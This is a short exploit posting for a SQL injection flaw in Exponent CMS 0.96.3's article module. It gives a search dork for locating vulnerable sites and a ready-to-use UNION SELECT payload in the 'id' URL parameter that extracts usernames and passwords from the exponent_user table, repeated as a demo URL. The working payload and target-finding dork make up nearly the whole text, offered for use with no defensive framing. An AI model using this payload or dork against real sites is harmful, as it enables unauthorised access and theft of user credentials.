Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability ======================================================== #################################################################### # Author : T u R c O # Home : www.1923Turk.com # Script : exponentcms # Dork: "Welcome to Exponent CMS" | "my new exponent site" inurl:articlemodule #################################################################### ===[ Exploit ]=== http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION -1+union+select+1,2,3,password,username,6+from+exponent_user-- Demo: http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user-- ####################################################################